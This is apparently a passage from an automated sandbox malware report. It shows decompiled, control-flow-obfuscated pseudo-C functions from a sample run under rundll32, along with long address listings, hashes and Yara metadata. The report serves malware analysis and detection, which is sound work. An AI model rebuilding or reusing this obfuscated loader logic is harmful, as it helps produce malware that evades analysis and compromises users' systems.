						goto L28;
					}
					if(E002C5E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E002C8B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                                    0x002c554f
                                                                                                                                    0x002c5558
                                                                                                                                    0x002c5560
                                                                                                                                    0x002c5561
                                                                                                                                    0x002c5568
                                                                                                                                    0x002c556f
                                                                                                                                    0x002c5570
                                                                                                                                    0x002c5572
                                                                                                                                    0x002c5577
                                                                                                                                    0x002c5582
                                                                                                                                    0x002c5584
                                                                                                                                    0x002c558f
                                                                                                                                    0x002c5592
                                                                                                                                    0x002c5598
                                                                                                                                    0x002c559c
                                                                                                                                    0x002c55a1
                                                                                                                                    0x002c55b0
                                                                                                                                    0x002c55b1
                                                                                                                                    0x002c55b5
                                                                                                                                    0x002c55bd
                                                                                                                                    0x002c55c5
                                                                                                                                    0x002c55cd
                                                                                                                                    0x002c55d5
                                                                                                                                    0x002c55d9
                                                                                                                                    0x002c55e1
                                                                                                                                    0x002c55e9
                                                                                                                                    0x002c55f6
                                                                                                                                    0x002c55fa
                                                                                                                                    0x002c5602
                                                                                                                                    0x002c560a
                                                                                                                                    0x002c5612
                                                                                                                                    0x002c561a
                                                                                                                                    0x002c5627
                                                                                                                                    0x002c562b
                                                                                                                                    0x002c5633
                                                                                                                                    0x002c563b
                                                                                                                                    0x002c5640
                                                                                                                                    0x002c5648
                                                                                                                                    0x002c5650
                                                                                                                                    0x002c5658
                                                                                                                                    0x002c5660
                                                                                                                                    0x002c5665
                                                                                                                                    0x002c566d
                                                                                                                                    0x002c5675
                                                                                                                                    0x002c5682
                                                                                                                                    0x002c5686
                                                                                                                                    0x002c568e
                                                                                                                                    0x002c5696
                                                                                                                                    0x002c569e
                                                                                                                                    0x002c56a3
                                                                                                                                    0x002c56ab
                                                                                                                                    0x002c56b3
                                                                                                                                    0x002c56bb
                                                                                                                                    0x002c56c3
                                                                                                                                    0x002c56cb
                                                                                                                                    0x002c56d3
                                                                                                                                    0x002c56db
                                                                                                                                    0x002c56e0
                                                                                                                                    0x002c56e8
                                                                                                                                    0x002c56f6
                                                                                                                                    0x002c56ff
                                                                                                                                    0x002c5703
                                                                                                                                    0x002c570b
                                                                                                                                    0x002c5713
                                                                                                                                    0x002c571b
                                                                                                                                    0x002c5720
                                                                                                                                    0x002c5728
                                                                                                                                    0x002c5730
                                                                                                                                    0x002c573a
                                                                                                                                    0x002c5742
                                                                                                                                    0x002c574a
                                                                                                                                    0x002c574f
                                                                                                                                    0x002c5757
                                                                                                                                    0x002c575f
                                                                                                                                    0x002c5767
                                                                                                                                    0x002c5775
                                                                                                                                    0x002c577a
                                                                                                                                    0x002c5780
                                                                                                                                    0x002c5788
                                                                                                                                    0x002c5790
                                                                                                                                    0x002c579c
                                                                                                                                    0x002c57a4
                                                                                                                                    0x002c57ad
                                                                                                                                    0x002c57b1
                                                                                                                                    0x002c57b6
                                                                                                                                    0x002c57be
                                                                                                                                    0x002c57c6
                                                                                                                                    0x002c57ce
                                                                                                                                    0x002c57d6
                                                                                                                                    0x002c57e3
                                                                                                                                    0x002c57e7
                                                                                                                                    0x00000000
                                                                                                                                    0x002c57ef
                                                                                                                                    0x002c5801
                                                                                                                                    0x002c591d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c591d
                                                                                                                                    0x002c580d
                                                                                                                                    0x002c58ac
                                                                                                                                    0x002c58bb
                                                                                                                                    0x002c58c0
                                                                                                                                    0x002c58c5
                                                                                                                                    0x002c58da
                                                                                                                                    0x002c58db
                                                                                                                                    0x002c58dc
                                                                                                                                    0x002c58e1
                                                                                                                                    0x002c58e7
                                                                                                                                    0x002c5901
                                                                                                                                    0x002c590f
                                                                                                                                    0x002c5912
                                                                                                                                    0x002c5915
                                                                                                                                    0x002c5915
                                                                                                                                    0x002c58e7
                                                                                                                                    0x002c5916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5916
                                                                                                                                    0x002c5819
                                                                                                                                    0x002c5856
                                                                                                                                    0x002c5859
                                                                                                                                    0x002c585b
                                                                                                                                    0x002c5860
                                                                                                                                    0x002c5864
                                                                                                                                    0x002c586e
                                                                                                                                    0x002c586b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c586d
                                                                                                                                    0x002c586d
                                                                                                                                    0x002c5872
                                                                                                                                    0x002c5874
                                                                                                                                    0x002c5878
                                                                                                                                    0x002c5892
                                                                                                                                    0x002c5892
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5892
                                                                                                                                    0x002c587a
                                                                                                                                    0x002c588c
                                                                                                                                    0x002c588c
                                                                                                                                    0x002c5890
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5890
                                                                                                                                    0x00000000
                                                                                                                                    0x002c587a
                                                                                                                                    0x002c581d
                                                                                                                                    0x002c5975
                                                                                                                                    0x002c597b
                                                                                                                                    0x002c5987
                                                                                                                                    0x002c5987
                                                                                                                                    0x002c5829
                                                                                                                                    0x002c595b
                                                                                                                                    0x002c5961
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5967
                                                                                                                                    0x002c5849
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c584f
                                                                                                                                    0x002c584f
                                                                                                                                    0x002c5943
                                                                                                                                    0x002c5948
                                                                                                                                    0x002c594d
                                                                                                                                    0x002c5959
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5959
                                                                                                                                    0x002c594f
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1t{$9Q$;<$e}n
                                                                                                                                    • API String ID: 0-2095593254
                                                                                                                                    • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                    • Instruction ID: 24baf32b704bc11484a559b229d801cf45b742eeb1593c7a65185def03046be3
                                                                                                                                    • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                    • Instruction Fuzzy Hash: 75B140B11183828FC328CF21C585A1BFBE1FBD4748F508A1DF29686260D7B1DA89CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D7DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002D7DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E002D6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E002E13AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E002DDCF7(_v1084, 0x2c1000, __eflags);
						_t256 =  *0x2e3e10; // 0x0
						_t272 =  *0x2e3e10; // 0x0
						E002C47CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E002CA8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E002CB6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E002CB1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E002D473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E002C3E3F();
					goto L8;
				}
				_t236 =  *0x2e3e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                                    0x002d7dd5
                                                                                                                                    0x002d7ddb
                                                                                                                                    0x002d7de2
                                                                                                                                    0x002d7de7
                                                                                                                                    0x002d7dec
                                                                                                                                    0x002d7df4
                                                                                                                                    0x002d7dfc
                                                                                                                                    0x002d7e0d
                                                                                                                                    0x002d7e11
                                                                                                                                    0x002d7e1f
                                                                                                                                    0x002d7e24
                                                                                                                                    0x002d7e2a
                                                                                                                                    0x002d7e32
                                                                                                                                    0x002d7e3a
                                                                                                                                    0x002d7e3f
                                                                                                                                    0x002d7e47
                                                                                                                                    0x002d7e4f
                                                                                                                                    0x002d7e54
                                                                                                                                    0x002d7e5c
                                                                                                                                    0x002d7e64
                                                                                                                                    0x002d7e6c
                                                                                                                                    0x002d7e74
                                                                                                                                    0x002d7e7c
                                                                                                                                    0x002d7e88
                                                                                                                                    0x002d7e8d
                                                                                                                                    0x002d7e93
                                                                                                                                    0x002d7e9b
                                                                                                                                    0x002d7ea3
                                                                                                                                    0x002d7eab
                                                                                                                                    0x002d7eb3
                                                                                                                                    0x002d7ebb
                                                                                                                                    0x002d7ec3
                                                                                                                                    0x002d7ecf
                                                                                                                                    0x002d7ed2
                                                                                                                                    0x002d7ed6
                                                                                                                                    0x002d7ede
                                                                                                                                    0x002d7ee6
                                                                                                                                    0x002d7eeb
                                                                                                                                    0x002d7ef3
                                                                                                                                    0x002d7efb
                                                                                                                                    0x002d7f03
                                                                                                                                    0x002d7f0b
                                                                                                                                    0x002d7f18
                                                                                                                                    0x002d7f1c
                                                                                                                                    0x002d7f24
                                                                                                                                    0x002d7f2c
                                                                                                                                    0x002d7f34
                                                                                                                                    0x002d7f39
                                                                                                                                    0x002d7f3d
                                                                                                                                    0x002d7f45
                                                                                                                                    0x002d7f4d
                                                                                                                                    0x002d7f55
                                                                                                                                    0x002d7f5a
                                                                                                                                    0x002d7f62
                                                                                                                                    0x002d7f6a
                                                                                                                                    0x002d7f72
                                                                                                                                    0x002d7f7a
                                                                                                                                    0x002d7f87
                                                                                                                                    0x002d7f8b
                                                                                                                                    0x002d7f90
                                                                                                                                    0x002d7f98
                                                                                                                                    0x002d7fa0
                                                                                                                                    0x002d7fa8
                                                                                                                                    0x002d7fb0
                                                                                                                                    0x002d7fbd
                                                                                                                                    0x002d7fca
                                                                                                                                    0x002d7fd7
                                                                                                                                    0x002d7fdf
                                                                                                                                    0x002d7fe4
                                                                                                                                    0x002d7fec
                                                                                                                                    0x002d7ff4
                                                                                                                                    0x002d7ffc
                                                                                                                                    0x002d8001
                                                                                                                                    0x002d8009
                                                                                                                                    0x002d8011
                                                                                                                                    0x002d8019
                                                                                                                                    0x002d801e
                                                                                                                                    0x002d8026
                                                                                                                                    0x002d802e
                                                                                                                                    0x002d8036
                                                                                                                                    0x002d803b
                                                                                                                                    0x002d8043
                                                                                                                                    0x002d804b
                                                                                                                                    0x002d8058
                                                                                                                                    0x002d805c
                                                                                                                                    0x002d8064
                                                                                                                                    0x002d806c
                                                                                                                                    0x002d8074
                                                                                                                                    0x002d807c
                                                                                                                                    0x002d8084
                                                                                                                                    0x002d808c
                                                                                                                                    0x002d8094
                                                                                                                                    0x002d809c
                                                                                                                                    0x002d80a4
                                                                                                                                    0x002d80ac
                                                                                                                                    0x002d80b9
                                                                                                                                    0x002d80bd
                                                                                                                                    0x002d80c5
                                                                                                                                    0x002d80cd
                                                                                                                                    0x002d80d2
                                                                                                                                    0x002d80da
                                                                                                                                    0x002d80e2
                                                                                                                                    0x002d80ea
                                                                                                                                    0x002d80f2
                                                                                                                                    0x002d80fa
                                                                                                                                    0x002d8102
                                                                                                                                    0x002d810c
                                                                                                                                    0x002d8110
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8118
                                                                                                                                    0x002d812a
                                                                                                                                    0x002d81f0
                                                                                                                                    0x002d81f5
                                                                                                                                    0x002d8200
                                                                                                                                    0x002d8201
                                                                                                                                    0x002d8210
                                                                                                                                    0x002d8215
                                                                                                                                    0x002d8218
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8218
                                                                                                                                    0x002d8132
                                                                                                                                    0x002d8164
                                                                                                                                    0x002d816d
                                                                                                                                    0x002d8175
                                                                                                                                    0x002d8186
                                                                                                                                    0x002d819e
                                                                                                                                    0x002d81b1
                                                                                                                                    0x002d81c6
                                                                                                                                    0x002d81cb
                                                                                                                                    0x002d81ce
                                                                                                                                    0x00000000
                                                                                                                                    0x002d81ce
                                                                                                                                    0x002d813a
                                                                                                                                    0x002d825a
                                                                                                                                    0x002d8263
                                                                                                                                    0x002d826d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d827c
                                                                                                                                    0x002d8142
                                                                                                                                    0x002d815d
                                                                                                                                    0x002d8155
                                                                                                                                    0x002d8155
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8155
                                                                                                                                    0x002d8146
                                                                                                                                    0x002d8239
                                                                                                                                    0x002d8239
                                                                                                                                    0x002d823f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d823f
                                                                                                                                    0x002d8150
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8150
                                                                                                                                    0x002d8222
                                                                                                                                    0x002d8227
                                                                                                                                    0x002d822e
                                                                                                                                    0x002d8237
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8237
                                                                                                                                    0x002d8230
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: MC=$g^/h$|[a$/
                                                                                                                                    • API String ID: 0-1545830693
                                                                                                                                    • Opcode ID: 98ea5c7fcc764b070793d7382a3381be06df9c261a8073fa29c1cd7532a6a8b0
                                                                                                                                    • Instruction ID: c43b45350fa33f05b793673594eeb3348ec13bf7eeb2adcd10e3f7bdf7c9bcd6
                                                                                                                                    • Opcode Fuzzy Hash: 98ea5c7fcc764b070793d7382a3381be06df9c261a8073fa29c1cd7532a6a8b0
                                                                                                                                    • Instruction Fuzzy Hash: 20C11FB11183818FC368CF26C58A91BFBF1FBC0758F508A1EF19656260D7B58A1ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DA2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002DA2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E002DC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E002D8519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E002C7FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E002CED7E(_v88, _t193, _v56, _t197, _t226);
												E002D8519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E002C7FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                                    0x002da2e8
                                                                                                                                    0x002da2e8
                                                                                                                                    0x002da2ef
                                                                                                                                    0x002da2f3
                                                                                                                                    0x002da2f7
                                                                                                                                    0x002da2ff
                                                                                                                                    0x002da304
                                                                                                                                    0x002da30c
                                                                                                                                    0x002da314
                                                                                                                                    0x002da31c
                                                                                                                                    0x002da321
                                                                                                                                    0x002da329
                                                                                                                                    0x002da331
                                                                                                                                    0x002da339
                                                                                                                                    0x002da342
                                                                                                                                    0x002da34b
                                                                                                                                    0x002da350
                                                                                                                                    0x002da355
                                                                                                                                    0x002da35b
                                                                                                                                    0x002da363
                                                                                                                                    0x002da36b
                                                                                                                                    0x002da373
                                                                                                                                    0x002da378
                                                                                                                                    0x002da37d
                                                                                                                                    0x002da385
                                                                                                                                    0x002da38d
                                                                                                                                    0x002da395
                                                                                                                                    0x002da39d
                                                                                                                                    0x002da3a5
                                                                                                                                    0x002da3b1
                                                                                                                                    0x002da3b6
                                                                                                                                    0x002da3bc
                                                                                                                                    0x002da3c4
                                                                                                                                    0x002da3cc
                                                                                                                                    0x002da3d8
                                                                                                                                    0x002da3db
                                                                                                                                    0x002da3df
                                                                                                                                    0x002da3e7
                                                                                                                                    0x002da3f4
                                                                                                                                    0x002da3f8
                                                                                                                                    0x002da400
                                                                                                                                    0x002da408
                                                                                                                                    0x002da410
                                                                                                                                    0x002da418
                                                                                                                                    0x002da420
                                                                                                                                    0x002da428
                                                                                                                                    0x002da430
                                                                                                                                    0x002da438
                                                                                                                                    0x002da440
                                                                                                                                    0x002da448
                                                                                                                                    0x002da450
                                                                                                                                    0x002da45d
                                                                                                                                    0x002da461
                                                                                                                                    0x002da469
                                                                                                                                    0x002da471
                                                                                                                                    0x002da479
                                                                                                                                    0x002da481
                                                                                                                                    0x002da486
                                                                                                                                    0x002da48e
                                                                                                                                    0x002da49b
                                                                                                                                    0x002da49f
                                                                                                                                    0x002da4a7
                                                                                                                                    0x002da4af
                                                                                                                                    0x002da4b7
                                                                                                                                    0x002da4bf
                                                                                                                                    0x002da4c7
                                                                                                                                    0x002da4cf
                                                                                                                                    0x002da4d3
                                                                                                                                    0x002da4d7
                                                                                                                                    0x002da4df
                                                                                                                                    0x002da4e7
                                                                                                                                    0x002da4ef
                                                                                                                                    0x002da4f4
                                                                                                                                    0x002da4f9
                                                                                                                                    0x002da501
                                                                                                                                    0x002da509
                                                                                                                                    0x002da511
                                                                                                                                    0x00000000
                                                                                                                                    0x002da519
                                                                                                                                    0x002da519
                                                                                                                                    0x002da519
                                                                                                                                    0x002da52b
                                                                                                                                    0x002da559
                                                                                                                                    0x002da55b
                                                                                                                                    0x002da55e
                                                                                                                                    0x002da564
                                                                                                                                    0x002da63c
                                                                                                                                    0x002da645
                                                                                                                                    0x002da56a
                                                                                                                                    0x002da56a
                                                                                                                                    0x002da570
                                                                                                                                    0x002da638
                                                                                                                                    0x002da63a
                                                                                                                                    0x002da651
